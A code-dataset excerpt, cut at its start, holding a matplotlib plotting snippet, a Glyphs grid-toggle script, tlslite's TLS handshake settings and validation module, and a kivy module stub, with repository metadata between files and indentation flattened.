x = [1,2,3,4,5,6]
# corresponding y axis values
y = [2,4,1,5,2,6]
plt.plot(x,y)
# plotting the points
plt.plot(x, y, color='green', linestyle='dashed', linewidth = 3, marker='o', markerfacecolor='blue', markersize=12)
# setting x and y axis range
plt.ylim(1,8)
plt.xlim(1,8)
# naming the x axis
plt.xlabel('x - axis')
# naming the y axis
plt.ylabel('y - axis')
# giving a title to my graph
plt.title('Some cool customizations!')
# function to show the plot
plt.show()
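#bar chart also works with numeric x values (a quick sketch reusing x and y)
plt.bar(x, y, width=0.5, color='purple')
plt.title('Bar with numeric x values')
plt.show()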
|
7f02a57e9ce5921ef4e0fa300b15dfa92f1697a5
|
23895eba556353a116d97a3e9fa60f7ed9c9f693
|
/Paths/Grid Switcher.py
|
d92ab7058b83fc7f8766c08c897728de9e7510e3
|
[
"Apache-2.0"
] |
permissive
|
mekkablue/Glyphs-Scripts
|
9970200e6b7223be58ff9122dd519af176f210de
|
fe09b4cf3754bc10c3037c3312a19c1b909a74d6
|
refs/heads/master
| 2023-08-28T15:02:21.931491
| 2023-08-25T17:12:34
| 2023-08-25T17:12:34
| 2,517,418
| 322
| 108
|
Apache-2.0
| 2023-08-15T15:24:50
| 2011-10-05T07:12:37
|
Python
|
UTF-8
|
Python
| false
| false
| 2,644
|
py
|
Grid Switcher.py
|
#MenuTitle: Grid Switcher
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
__doc__ = """
Toggles grid between two gridstep values.
"""
import vanilla
class GridOnOff(object):
def __init__(self):
self.gridStep1default = 1
self.gridStep2default = 0
currentGridStep = Glyphs.font.gridMain()
self.w = vanilla.FloatingWindow((170, 100), "Grid Switcher", autosaveName="com.mekkablue.GridOnOff.mainwindow")
self.w.grid1 = vanilla.EditText((15, 12, 65, 15 + 3), "1", sizeStyle='small')
self.w.grid2 = vanilla.EditText((-80, 12, -15, 15 + 3), "50", sizeStyle='small')
self.w.currentGridStep = vanilla.TextBox((15, 38, -15, 22), "Current Grid Step: %i" % currentGridStep, sizeStyle='regular')
self.w.switchButton = vanilla.Button((15, -22 - 15, -15, -15), "Switch Grid", sizeStyle='regular', callback=self.GridOnOffMain)
self.w.setDefaultButton(self.w.switchButton)
self.w.center()
self.w.open()
self.w.makeKey()
# Load Settings:
if not self.LoadPreferences():
print("Note: 'Grid Switcher' could not load preferences. Will resort to defaults")
def GridOnOffMain(self, sender):
try:
if not self.SavePreferences(self):
print("Note: 'Grid Switcher' could not write preferences.")
try:
gridStep1 = int(Glyphs.defaults["com.mekkablue.gridswitch.grid1"])
except:
gridStep1 = self.gridStep1default
self.w.grid1.set(gridStep1)
try:
gridStep2 = int(Glyphs.defaults["com.mekkablue.gridswitch.grid2"])
except:
gridStep2 = self.gridStep2default
self.w.grid2.set(gridStep2)
gridStep = Glyphs.font.gridMain()
if gridStep != gridStep1:
newGridStep = gridStep1
else:
newGridStep = gridStep2
Glyphs.font.setGridMain_(newGridStep)
self.w.currentGridStep.set("Current Grid Step: %i" % newGridStep)
except Exception as e:
raise e
def SavePreferences(self, sender):
try:
Glyphs.defaults["com.mekkablue.gridswitch.grid1"] = self.w.grid1.get()
Glyphs.defaults["com.mekkablue.gridswitch.grid2"] = self.w.grid2.get()
except:
return False
return True
def LoadPreferences(self):
try:
Glyphs.registerDefault("com.mekkablue.gridswitch.grid1", 1)
Glyphs.registerDefault("com.mekkablue.gridswitch.grid2", 0)
self.w.grid1.set(Glyphs.defaults["com.mekkablue.gridswitch.grid1"])
self.w.grid2.set(Glyphs.defaults["com.mekkablue.gridswitch.grid2"])
try:
self.gridStep1default = int(Glyphs.defaults["com.mekkablue.gridswitch.grid1"])
self.gridStep2default = int(Glyphs.defaults["com.mekkablue.gridswitch.grid2"])
except:
pass
except:
return False
return True
GridOnOff()
|
591b30947d782f1957e0862a086b400b78e2a0a5
|
0f89cda6f3ae5092e0b44b9441fd93b5a2d4a703
|
/code/default/lib/noarch/tlslite/handshakesettings.py
|
352a566de330db58a8b5ae55bed9bbf6d8789f43
|
[
"BSD-2-Clause"
] |
permissive
|
XX-net/XX-Net
|
ef59074e7dd67d1334c59bb076519bb796db4f4e
|
541f58da464296001109f9cfbb879256957b3819
|
refs/heads/master
| 2023-08-28T04:56:16.921687
| 2023-08-27T06:17:05
| 2023-08-27T06:17:32
| 29,290,473
| 40,250
| 11,454
| null | 2023-04-28T15:12:20
| 2015-01-15T09:35:51
|
Python
|
UTF-8
|
Python
| false
| false
| 32,163
|
py
|
handshakesettings.py
|
# Authors:
# Trevor Perrin
# Dave Baggett (Arcode Corporation) - cleanup handling of constants
# Yngve Pettersen (ported by Paul Sokolovsky) - TLS 1.2
#
# See the LICENSE file for legal information regarding use of this file.
"""Class for setting handshake parameters."""
from .constants import CertificateType
from .utils import cryptomath
from .utils import cipherfactory
from .utils.compat import ecdsaAllCurves, int_types
CIPHER_NAMES = ["chacha20-poly1305",
"aes256gcm", "aes128gcm",
"aes256ccm", "aes128ccm",
"aes256", "aes128",
"3des"]
ALL_CIPHER_NAMES = CIPHER_NAMES + ["chacha20-poly1305_draft00",
"aes128ccm_8", "aes256ccm_8",
"rc4", "null"]
# Don't allow "md5" by default
MAC_NAMES = ["sha", "sha256", "sha384", "aead"]
ALL_MAC_NAMES = MAC_NAMES + ["md5"]
KEY_EXCHANGE_NAMES = ["ecdhe_ecdsa", "rsa", "dhe_rsa", "ecdhe_rsa", "srp_sha",
"srp_sha_rsa", "ecdh_anon", "dh_anon", "dhe_dsa"]
CIPHER_IMPLEMENTATIONS = ["openssl", "pycrypto", "python"]
CERTIFICATE_TYPES = ["x509"]
RSA_SIGNATURE_HASHES = ["sha512", "sha384", "sha256", "sha224", "sha1"]
DSA_SIGNATURE_HASHES = ["sha512", "sha384", "sha256", "sha224", "sha1"]
ECDSA_SIGNATURE_HASHES = ["sha512", "sha384", "sha256", "sha224", "sha1"]
ALL_RSA_SIGNATURE_HASHES = RSA_SIGNATURE_HASHES + ["md5"]
SIGNATURE_SCHEMES = ["Ed25519", "Ed448"]
RSA_SCHEMES = ["pss", "pkcs1"]
# while secp521r1 is the most secure, it's also much slower than the others
# so place it as the last one
CURVE_NAMES = ["x25519", "x448", "secp384r1", "secp256r1",
"secp521r1"]
ALL_CURVE_NAMES = CURVE_NAMES + ["secp256k1", "brainpoolP512r1",
"brainpoolP384r1", "brainpoolP256r1"]
if ecdsaAllCurves:
ALL_CURVE_NAMES += ["secp224r1", "secp192r1"]
ALL_DH_GROUP_NAMES = ["ffdhe2048", "ffdhe3072", "ffdhe4096", "ffdhe6144",
"ffdhe8192"]
CURVE_ALIASES = {"secp256r1": ('NIST256p', 'prime256v1', 'P-256'),
"secp384r1": ('NIST384p', 'P-384'),
"secp521r1": ('NIST521p', 'P-521'),
"secp256k1": ('SECP256k1',),
"secp192r1": ('NIST192p', 'P-192'),
"secp224r1": ('NIST224p', 'P-224'),
"brainpoolP256r1": ('BRAINPOOLP256r1',),
"brainpoolP384r1": ('BRAINPOOLP384r1',),
"brainpoolP512r1": ('BRAINPOOLP512r1',)}
# list of supported groups in TLS 1.3 as per RFC 8446, chapter 4.2.7. (excluding private use here)
TLS13_PERMITTED_GROUPS = ["secp256r1", "secp384r1", "secp521r1",
"x25519", "x448", "ffdhe2048",
"ffdhe3072", "ffdhe4096", "ffdhe6144",
"ffdhe8192"]
KNOWN_VERSIONS = ((3, 0), (3, 1), (3, 2), (3, 3), (3, 4))
TICKET_CIPHERS = ["chacha20-poly1305", "aes256gcm", "aes128gcm", "aes128ccm",
"aes128ccm_8", "aes256ccm", "aes256ccm_8"]
PSK_MODES = ["psk_dhe_ke", "psk_ke"]
class Keypair(object):
"""
Key, certificate and related data.
    Also stores certificate-associated data like OCSP responses and transparency info.
TODO: add the above
First certificate in certificates needs to match key, remaining should
build a trust path to a root CA.
:vartype key: RSAKey or ECDSAKey
:ivar key: private key
:vartype certificates: list(X509)
:ivar certificates: the certificates to send to peer if the key is selected
for use. The first one MUST include the public key of the ``key``
"""
def __init__(self, key=None, certificates=tuple()):
self.key = key
self.certificates = certificates
def validate(self):
"""Sanity check the keypair."""
if not self.key or not self.certificates:
raise ValueError("Key or certificate missing in Keypair")
class VirtualHost(object):
"""
    Configuration of keys and certs for a single virtual server.
This class encapsulates keys and certificates for hosts specified by
server_name (SNI) and ALPN extensions.
TODO: support SRP as alternative to certificates
TODO: support PSK as alternative to certificates
:vartype keys: list(Keypair)
:ivar keys: List of certificates and keys to be used in this
        virtual host. The first keypair able to serve the ClientHello will be used.
:vartype hostnames: set(bytes)
:ivar hostnames: all the hostnames that server supports
please use :py:meth:`matches_hostname` to verify if the VirtualHost
can serve a request to a given hostname as that allows wildcard hosts
that always reply True.
:vartype trust_anchors: list(X509)
:ivar trust_anchors: list of CA certificates supported for client
certificate authentication, sent in CertificateRequest
:ivar list(bytes) app_protocols: all the application protocols that the
server supports (for ALPN)
"""
def __init__(self):
"""Set up default configuration."""
self.keys = []
self.hostnames = set()
self.trust_anchors = []
self.app_protocols = []
def matches_hostname(self, hostname):
"""Checks if the virtual host can serve hostname"""
return hostname in self.hostnames
def validate(self):
"""Sanity check the settings"""
if not self.keys:
raise ValueError("Virtual host missing keys")
for i in self.keys:
i.validate()
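# A minimal configuration sketch (not part of the original module);
# `private_key` and `cert` are placeholders for objects loaded elsewhere:
#
#     host = VirtualHost()
#     host.keys = [Keypair(key=private_key, certificates=[cert])]
#     host.hostnames = {b"example.com"}
#     host.validate()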
class HandshakeSettings(object):
"""
This class encapsulates various parameters that can be used with
a TLS handshake.
:vartype minKeySize: int
:ivar minKeySize: The minimum bit length for asymmetric keys.
If the other party tries to use SRP, RSA, DSA, or Diffie-Hellman
parameters smaller than this length, an alert will be
signalled. The default is 1023.
:vartype maxKeySize: int
:ivar maxKeySize: The maximum bit length for asymmetric keys.
If the other party tries to use SRP, RSA, DSA, or Diffie-Hellman
parameters larger than this length, an alert will be signalled.
The default is 8193.
:vartype cipherNames: list(str)
:ivar cipherNames: The allowed ciphers.
The allowed values in this list are 'chacha20-poly1305', 'aes256gcm',
'aes128gcm', 'aes256', 'aes128', '3des', 'chacha20-poly1305_draft00',
'null' and
'rc4'. If these settings are used with a client handshake, they
determine the order of the ciphersuites offered in the ClientHello
message.
If these settings are used with a server handshake, the server will
choose whichever ciphersuite matches the earliest entry in this
list.
        The default value is a list that excludes 'rc4', 'null' and
'chacha20-poly1305_draft00'.
:vartype macNames: list(str)
:ivar macNames: The allowed MAC algorithms.
The allowed values in this list are 'sha384', 'sha256', 'aead', 'sha'
and 'md5'.
        The default value is a list that excludes 'md5'.
:vartype certificateTypes: list(str)
:ivar certificateTypes: The allowed certificate types.
The only allowed certificate type is 'x509'. This list is only used
with a
client handshake. The client will advertise to the server which
certificate
types are supported, and will check that the server uses one of the
appropriate types.
:vartype minVersion: tuple
:ivar minVersion: The minimum allowed SSL/TLS version.
        This variable can be set to (3, 0) for SSL 3.0, (3, 1) for TLS 1.0,
        (3, 2) for TLS 1.1, (3, 3) for TLS 1.2, or (3, 4) for TLS 1.3. If the
        other party wishes to use a lower version, a protocol_version alert
        will be signalled. The default is (3, 1).
:vartype maxVersion: tuple
:ivar maxVersion: The maximum allowed SSL/TLS version.
        This variable can be set to (3, 0) for SSL 3.0, (3, 1) for TLS 1.0,
        (3, 2) for TLS 1.1, (3, 3) for TLS 1.2, or (3, 4) for TLS 1.3. If the
        other party wishes to use a higher version, a protocol_version alert
        will be signalled. The default is (3, 4).
.. warning:: Some servers may (improperly) reject clients which offer
support
for TLS 1.1 or higher. In this case, try lowering maxVersion to
(3, 1).
:vartype useExperimentalTackExtension: bool
:ivar useExperimentalTackExtension: Whether to enabled TACK support.
Note that TACK support is not standardized by IETF and uses a temporary
TLS Extension number, so should NOT be used in production software.
:vartype sendFallbackSCSV: bool
:ivar sendFallbackSCSV: Whether to, as a client, send FALLBACK_SCSV.
:vartype rsaSigHashes: list(str)
:ivar rsaSigHashes: List of hashes supported (and advertised as such) for
TLS 1.2 signatures over Server Key Exchange or Certificate Verify with
RSA signature algorithm.
The list is sorted from most wanted to least wanted algorithm.
The allowed hashes are: "md5", "sha1", "sha224", "sha256",
"sha384" and "sha512". The default list does not include md5.
:vartype dsaSigHashes: list(str)
:ivar dsaSigHashes: List of hashes supported (and advertised as such) for
TLS 1.2 signatures over Server Key Exchange or Certificate Verify with
DSA signature algorithm.
The list is sorted from most wanted to least wanted algorithm.
The allowed hashes are: "sha1", "sha224", "sha256",
"sha384" and "sha512".
:vartype ecdsaSigHashes: list(str)
:ivar ecdsaSigHashes: List of hashes supported (and advertised as such) for
TLS 1.2 signatures over Server Key Exchange or Certificate Verify with
ECDSA signature algorithm.
The list is sorted from most wanted to least wanted algorithm.
The allowed hashes are: "sha1", "sha224", "sha256",
"sha384" and "sha512".
"vartype more_sig_schemes: list(str)
:ivar more_sig_schemes: List of additional signatures schemes (ones
that don't use RSA-PKCS#1 v1.5, RSA-PSS, DSA, or ECDSA) to advertise
as supported.
Currently supported are: "Ed25519", and "Ed448".
:vartype eccCurves: list(str)
:ivar eccCurves: List of named curves that are to be advertised as
supported in supported_groups extension.
:vartype useEncryptThenMAC: bool
:ivar useEncryptThenMAC: whether to support the encrypt then MAC extension
from RFC 7366. True by default.
:vartype useExtendedMasterSecret: bool
:ivar useExtendedMasterSecret: whether to support the extended master
secret calculation from RFC 7627. True by default.
:vartype requireExtendedMasterSecret: bool
:ivar requireExtendedMasterSecret: whether to require negotiation of
extended master secret calculation for successful connection. Requires
useExtendedMasterSecret to be set to true. False by default.
:vartype defaultCurve: str
:ivar defaultCurve: curve that will be used by server in case the client
did not advertise support for any curves. It does not have to be the
first curve for eccCurves and may be distinct from curves from that
list.
:vartype keyShares: list(str)
:ivar keyShares: list of TLS 1.3 key shares to include in Client Hello
:vartype padding_cb: func
:ivar padding_cb: Callback to function computing number of padding bytes
for TLS 1.3. Signature is cb_func(msg_size, content_type, max_size).
:vartype pskConfigs: list(tuple(bytearray, bytearray, bytearray))
:ivar pskConfigs: list of tuples, first element of the tuple is the
human readable, UTF-8 encoded, "identity" of the associated secret
(bytearray, can be empty for TLS 1.2 and earlier), second element is
the binary secret (bytearray), third is an optional parameter
specifying the PRF hash to be used in TLS 1.3 (``sha256`` or
``sha384``)
:vartype ticketKeys: list(bytearray)
:ivar ticketKeys: keys to be used for encrypting and decrypting session
tickets. First entry is the encryption key for new tickets and the
default decryption key, subsequent entries are the fallback keys
allowing for key rollover. The keys need to be of size appropriate
for a selected cipher in ticketCipher, 32 bytes for 'aes256gcm' and
        'chacha20-poly1305', 16 bytes for 'aes128gcm'.
New keys should be generated regularly and replace old ones. Key use
time should generally not be longer than 24h and key life-time should
not be longer than 48h.
Leave empty to disable session ticket support on server side.
:vartype ticketCipher: str
:ivar ticketCipher: name of the cipher used for encrypting the session
tickets. 'aes256gcm' by default, 'aes128gcm' or 'chacha20-poly1305'
alternatively.
:vartype ticketLifetime: int
:ivar ticketLifetime: maximum allowed lifetime of ticket encryption key,
in seconds. 1 day by default
:vartype psk_modes: list(str)
:ivar psk_modes: acceptable modes for the PSK key exchange in TLS 1.3
:ivar int max_early_data: maximum number of bytes acceptable for 0-RTT
early_data processing. In other words, how many bytes will the server
try to process, but ignore, in case the Client Hello includes
early_data extension.
:vartype use_heartbeat_extension: bool
:ivar use_heartbeat_extension: whether to support heartbeat extension from
RFC 6520. True by default.
:vartype heartbeat_response_callback: func
:ivar heartbeat_response_callback: Callback to function when Heartbeat
response is received.
:vartype ~.record_size_limit: int
:ivar ~.record_size_limit: maximum size of records we are willing to process
(value advertised to the other side). It must not be larger than
2**14+1 (the maximum for TLS 1.3) and will be reduced to 2**14 if TLS
1.2 or lower is the highest enabled version. Must not be set to values
smaller than 64. Set to None to disable support for the extension.
See also: RFC 8449.
:vartype keyExchangeNames: list
:ivar keyExchangeNames: Enabled key exchange types for the connection,
influences selected cipher suites.
"""
def _init_key_settings(self):
"""Create default variables for key-related settings."""
self.minKeySize = 1023
self.maxKeySize = 8193
self.rsaSigHashes = list(RSA_SIGNATURE_HASHES)
self.rsaSchemes = list(RSA_SCHEMES)
self.dsaSigHashes = list(DSA_SIGNATURE_HASHES)
self.virtual_hosts = []
# DH key settings
self.eccCurves = list(CURVE_NAMES)
self.dhParams = None
self.dhGroups = list(ALL_DH_GROUP_NAMES)
self.defaultCurve = "secp256r1"
self.keyShares = ["secp256r1", "x25519"]
self.padding_cb = None
self.use_heartbeat_extension = True
self.heartbeat_response_callback = None
def _init_misc_extensions(self):
"""Default variables for assorted extensions."""
self.certificateTypes = list(CERTIFICATE_TYPES)
self.useExperimentalTackExtension = False
self.sendFallbackSCSV = False
self.useEncryptThenMAC = True
self.ecdsaSigHashes = list(ECDSA_SIGNATURE_HASHES)
self.more_sig_schemes = list(SIGNATURE_SCHEMES)
self.usePaddingExtension = True
self.useExtendedMasterSecret = True
self.requireExtendedMasterSecret = False
# PSKs
self.pskConfigs = []
self.psk_modes = list(PSK_MODES)
# session tickets
self.ticketKeys = []
self.ticketCipher = "aes256gcm"
self.ticketLifetime = 24 * 60 * 60
self.max_early_data = 2 ** 14 + 16 # full record + tag
# send two tickets so that client can quickly ramp up number of
        # resumed connections (as tickets are single-use in TLS 1.3)
self.ticket_count = 2
self.record_size_limit = 2**14 + 1 # TLS 1.3 includes content type
def __init__(self):
"""Initialise default values for settings."""
self._init_key_settings()
self._init_misc_extensions()
self.minVersion = (3, 1)
self.maxVersion = (3, 4)
self.versions = [(3, 4), (3, 3), (3, 2), (3, 1)]
self.cipherNames = list(CIPHER_NAMES)
self.macNames = list(MAC_NAMES)
self.keyExchangeNames = list(KEY_EXCHANGE_NAMES)
self.cipherImplementations = list(CIPHER_IMPLEMENTATIONS)
@staticmethod
def _sanityCheckKeySizes(other):
"""Check if key size limits are sane"""
if other.minKeySize < 512:
raise ValueError("minKeySize too small")
if other.minKeySize > 16384:
raise ValueError("minKeySize too large")
if other.maxKeySize < 512:
raise ValueError("maxKeySize too small")
if other.maxKeySize > 16384:
raise ValueError("maxKeySize too large")
if other.maxKeySize < other.minKeySize:
raise ValueError("maxKeySize smaller than minKeySize")
# check also keys of virtual hosts
for i in other.virtual_hosts:
i.validate()
@staticmethod
def _not_matching(values, sieve):
"""Return list of items from values that are not in sieve."""
return [val for val in values if val not in sieve]
@staticmethod
def _sanityCheckCipherSettings(other):
"""Check if specified cipher settings are known."""
not_matching = HandshakeSettings._not_matching
unknownCiph = not_matching(other.cipherNames, ALL_CIPHER_NAMES)
if unknownCiph:
raise ValueError("Unknown cipher name: {0}".format(unknownCiph))
unknownMac = not_matching(other.macNames, ALL_MAC_NAMES)
if unknownMac:
raise ValueError("Unknown MAC name: {0}".format(unknownMac))
unknownKex = not_matching(other.keyExchangeNames, KEY_EXCHANGE_NAMES)
if unknownKex:
raise ValueError("Unknown key exchange name: {0}"
.format(unknownKex))
unknownImpl = not_matching(other.cipherImplementations,
CIPHER_IMPLEMENTATIONS)
if unknownImpl:
raise ValueError("Unknown cipher implementation: {0}"
.format(unknownImpl))
@staticmethod
def _sanityCheckECDHSettings(other):
"""Check ECDHE settings if they are sane."""
not_matching = HandshakeSettings._not_matching
unknownCurve = not_matching(other.eccCurves, ALL_CURVE_NAMES)
if unknownCurve:
raise ValueError("Unknown ECC Curve name: {0}"
.format(unknownCurve))
if other.defaultCurve not in ALL_CURVE_NAMES:
raise ValueError("Unknown default ECC Curve name: {0}"
.format(other.defaultCurve))
nonAdvertisedGroup = [val for val in other.keyShares
if val not in other.eccCurves and
val not in other.dhGroups]
if nonAdvertisedGroup:
raise ValueError("Key shares for not enabled groups specified: {0}"
.format(nonAdvertisedGroup))
unknownSigHash = not_matching(other.ecdsaSigHashes,
ECDSA_SIGNATURE_HASHES)
if unknownSigHash:
raise ValueError("Unknown ECDSA signature hash: '{0}'".\
format(unknownSigHash))
unknownSigHash = not_matching(other.more_sig_schemes,
SIGNATURE_SCHEMES)
if unknownSigHash:
raise ValueError("Unkonwn more_sig_schemes specified: '{0}'"
.format(unknownSigHash))
unknownDHGroup = not_matching(other.dhGroups, ALL_DH_GROUP_NAMES)
if unknownDHGroup:
raise ValueError("Unknown FFDHE group name: '{0}'"
.format(unknownDHGroup))
# TLS 1.3 limits the allowed groups (RFC 8446,ch. 4.2.7.)
if other.maxVersion == (3, 4):
forbiddenGroup = HandshakeSettings._not_matching(other.eccCurves, TLS13_PERMITTED_GROUPS)
if forbiddenGroup:
raise ValueError("The following enabled groups are forbidden in TLS 1.3: {0}"
.format(forbiddenGroup))
@staticmethod
def _sanityCheckDHSettings(other):
"""Check if (EC)DHE settings are sane."""
not_matching = HandshakeSettings._not_matching
HandshakeSettings._sanityCheckECDHSettings(other)
unknownKeyShare = [val for val in other.keyShares
if val not in ALL_DH_GROUP_NAMES and
val not in ALL_CURVE_NAMES]
if unknownKeyShare:
raise ValueError("Unknown key share: '{0}'"
.format(unknownKeyShare))
if other.dhParams and (len(other.dhParams) != 2 or
not isinstance(other.dhParams[0], int_types) or
not isinstance(other.dhParams[1], int_types)):
raise ValueError("DH parameters need to be a tuple of integers")
@staticmethod
def _sanityCheckPrimitivesNames(other):
"""Check if specified cryptographic primitive names are known"""
HandshakeSettings._sanityCheckCipherSettings(other)
HandshakeSettings._sanityCheckDHSettings(other)
not_matching = HandshakeSettings._not_matching
unknownType = not_matching(other.certificateTypes, CERTIFICATE_TYPES)
if unknownType:
raise ValueError("Unknown certificate type: {0}"
.format(unknownType))
unknownSigHash = not_matching(other.rsaSigHashes,
ALL_RSA_SIGNATURE_HASHES)
if unknownSigHash:
raise ValueError("Unknown RSA signature hash: '{0}'"
.format(unknownSigHash))
unknownRSAPad = not_matching(other.rsaSchemes, RSA_SCHEMES)
if unknownRSAPad:
raise ValueError("Unknown RSA padding mode: '{0}'"
.format(unknownRSAPad))
unknownSigHash = not_matching(other.dsaSigHashes,
DSA_SIGNATURE_HASHES)
if unknownSigHash:
raise ValueError("Unknown DSA signature hash: '{0}'"
.format(unknownSigHash))
if not other.rsaSigHashes and not other.ecdsaSigHashes and \
not other.dsaSigHashes and not other.more_sig_schemes and \
other.maxVersion >= (3, 3):
raise ValueError("TLS 1.2 requires signature algorithms to be set")
@staticmethod
def _sanityCheckProtocolVersions(other):
"""Check if set protocol version are sane"""
if other.minVersion > other.maxVersion:
raise ValueError("Versions set incorrectly")
if other.minVersion not in KNOWN_VERSIONS:
raise ValueError("minVersion set incorrectly")
if other.maxVersion not in KNOWN_VERSIONS:
raise ValueError("maxVersion set incorrectly")
if other.maxVersion < (3, 4):
other.versions = [i for i in other.versions if i < (3, 4)]
@staticmethod
def _sanityCheckEMSExtension(other):
"""Check if settings for EMS are sane."""
if other.useExtendedMasterSecret not in (True, False):
raise ValueError("useExtendedMasterSecret must be True or False")
if other.requireExtendedMasterSecret not in (True, False):
raise ValueError("requireExtendedMasterSecret must be True "
"or False")
if other.requireExtendedMasterSecret and \
not other.useExtendedMasterSecret:
raise ValueError("requireExtendedMasterSecret requires "
"useExtendedMasterSecret")
@staticmethod
def _sanityCheckExtensions(other):
"""Check if set extension settings are sane"""
if other.useEncryptThenMAC not in (True, False):
raise ValueError("useEncryptThenMAC can only be True or False")
if other.usePaddingExtension not in (True, False):
raise ValueError("usePaddingExtension must be True or False")
if other.use_heartbeat_extension not in (True, False):
raise ValueError("use_heartbeat_extension must be True or False")
if other.heartbeat_response_callback and not other.use_heartbeat_extension:
raise ValueError("heartbeat_response_callback requires "
"use_heartbeat_extension")
if other.record_size_limit is not None and \
not 64 <= other.record_size_limit <= 2**14 + 1:
raise ValueError("record_size_limit cannot exceed 2**14+1 bytes")
HandshakeSettings._sanityCheckEMSExtension(other)
@staticmethod
def _not_allowed_len(values, sieve):
"""Return True if length of any item in values is not in sieve."""
sieve = set(sieve)
return any(len(i) not in sieve for i in values)
@staticmethod
def _sanityCheckPsks(other):
"""Check if the set PSKs are sane."""
if HandshakeSettings._not_allowed_len(other.pskConfigs, [2, 3]):
raise ValueError("pskConfigs items must be a 2 or 3-element"
"tuples")
badHashes = [i[2] for i in other.pskConfigs if
len(i) == 3 and i[2] not in set(['sha256', 'sha384'])]
if badHashes:
raise ValueError("pskConfigs include invalid hash specifications: "
"{0}".format(badHashes))
bad_psk_modes = [i for i in other.psk_modes if
i not in PSK_MODES]
if bad_psk_modes:
raise ValueError("psk_modes includes invalid key exchange modes: "
"{0}".format(bad_psk_modes))
@staticmethod
def _sanityCheckTicketSettings(other):
"""Check if the session ticket settings are sane."""
if other.ticketCipher not in TICKET_CIPHERS:
raise ValueError("Invalid cipher for session ticket encryption: "
"{0}".format(other.ticketCipher))
if HandshakeSettings._not_allowed_len(other.ticketKeys, [16, 32]):
raise ValueError("Session ticket encryption keys must be 16 or 32"
"bytes long")
if not 0 < other.ticketLifetime <= 7 * 24 * 60 * 60:
raise ValueError("Ticket lifetime must be a positive integer "
"smaller or equal 604800 (7 days)")
# while not ticket setting per-se, it is related to session tickets
if not 0 < other.max_early_data <= 2**64:
raise ValueError("max_early_data must be between 0 and 2GiB")
if not 0 <= other.ticket_count < 2**16:
raise ValueError("Incorrect amount for number of new session "
"tickets to send")
def _copy_cipher_settings(self, other):
"""Copy values related to cipher selection."""
other.cipherNames = self.cipherNames
other.macNames = self.macNames
other.keyExchangeNames = self.keyExchangeNames
other.cipherImplementations = self.cipherImplementations
other.minVersion = self.minVersion
other.maxVersion = self.maxVersion
other.versions = self.versions
def _copy_extension_settings(self, other):
"""Copy values of settings related to extensions."""
other.useExtendedMasterSecret = self.useExtendedMasterSecret
other.requireExtendedMasterSecret = self.requireExtendedMasterSecret
other.useExperimentalTackExtension = self.useExperimentalTackExtension
other.sendFallbackSCSV = self.sendFallbackSCSV
other.useEncryptThenMAC = self.useEncryptThenMAC
other.usePaddingExtension = self.usePaddingExtension
# session tickets
other.padding_cb = self.padding_cb
other.ticketKeys = self.ticketKeys
other.ticketCipher = self.ticketCipher
other.ticketLifetime = self.ticketLifetime
other.max_early_data = self.max_early_data
other.ticket_count = self.ticket_count
other.record_size_limit = self.record_size_limit
@staticmethod
def _remove_all_matches(values, needle):
"""Remove all instances of needle from values."""
values[:] = (i for i in values if i != needle)
def _sanity_check_ciphers(self, other):
"""Remove unsupported ciphers in current configuration."""
if not cipherfactory.tripleDESPresent:
other.cipherNames = other.cipherNames[:]
self._remove_all_matches(other.cipherNames, "3des")
if not other.cipherNames:
raise ValueError("No supported ciphers")
def _sanity_check_implementations(self, other):
"""Remove all backends that are not loaded."""
if not cryptomath.m2cryptoLoaded:
self._remove_all_matches(other.cipherImplementations, "openssl")
if not cryptomath.pycryptoLoaded:
self._remove_all_matches(other.cipherImplementations, "pycrypto")
if not other.cipherImplementations:
raise ValueError("No supported cipher implementations")
def _copy_key_settings(self, other):
"""Copy key-related settings."""
other.minKeySize = self.minKeySize
other.maxKeySize = self.maxKeySize
other.certificateTypes = self.certificateTypes
other.rsaSigHashes = self.rsaSigHashes
other.rsaSchemes = self.rsaSchemes
other.dsaSigHashes = self.dsaSigHashes
other.ecdsaSigHashes = self.ecdsaSigHashes
other.more_sig_schemes = self.more_sig_schemes
other.virtual_hosts = self.virtual_hosts
# DH key params
other.eccCurves = self.eccCurves
other.dhParams = self.dhParams
other.dhGroups = self.dhGroups
other.defaultCurve = self.defaultCurve
other.keyShares = self.keyShares
other.use_heartbeat_extension = self.use_heartbeat_extension
other.heartbeat_response_callback = self.heartbeat_response_callback
def validate(self):
"""
Validate the settings, filter out unsupported ciphersuites and return
a copy of object. Does not modify the original object.
:rtype: HandshakeSettings
:returns: a self-consistent copy of settings
:raises ValueError: when settings are invalid, insecure or unsupported.
"""
other = HandshakeSettings()
self._copy_cipher_settings(other)
self._copy_extension_settings(other)
self._copy_key_settings(other)
other.pskConfigs = self.pskConfigs
other.psk_modes = self.psk_modes
if not other.certificateTypes:
raise ValueError("No supported certificate types")
self._sanityCheckKeySizes(other)
self._sanityCheckPrimitivesNames(other)
self._sanityCheckProtocolVersions(other)
self._sanityCheckExtensions(other)
if other.maxVersion < (3, 3):
# No sha-2 and AEAD pre TLS 1.2
other.macNames = [e for e in self.macNames if
e == "sha" or e == "md5"]
self._sanityCheckPsks(other)
self._sanityCheckTicketSettings(other)
self._sanity_check_implementations(other)
self._sanity_check_ciphers(other)
return other
def getCertificateTypes(self):
"""Get list of certificate types as IDs"""
ret = []
for ct in self.certificateTypes:
if ct == "x509":
ret.append(CertificateType.x509)
else:
raise AssertionError()
return ret
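# A minimal usage sketch (not part of the original module): restrict the
# connection to TLS 1.2+ with AEAD ciphers and obtain a validated copy of
# the settings, which would then typically be handed to a handshake call.
#
#     settings = HandshakeSettings()
#     settings.minVersion = (3, 3)
#     settings.cipherNames = ["chacha20-poly1305", "aes256gcm", "aes128gcm"]
#     checked = settings.validate()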
|
52a09203d07b63cd73f31653ad3e4a2de27b3f70
|
48d1002394d233cf5932c7ef69300400af79118a
|
/kivy/event.py
|
52f352c59d55b76e48209fffbac3d00458b6c727
|
[
"LGPL-2.1-only",
"MIT",
"Apache-2.0"
] |
permissive
|
kivy/kivy
|
ba2668bffe4e125fd1c5aace54f671343802850e
|
ca1b918c656f23e401707388f25f4a63d9b8ae7d
|
refs/heads/master
| 2023-09-04T02:27:05.311875
| 2023-08-26T08:00:20
| 2023-08-26T08:00:20
| 1,049,095
| 16,076
| 4,161
|
MIT
| 2023-09-09T07:55:18
| 2010-11-03T20:27:32
|
Python
|
UTF-8
|
Python
| false
| false
| 555
|
py
|
event.py
|
# This is a "jumping" module, required for python-for-android project
# Because we are putting all the module into the same .so, there can be name
# conflict. We have one conflict with pygame.event and kivy.event => Both are
# python extension and have the same "initevent" symbol. So right now, just
# rename this one.
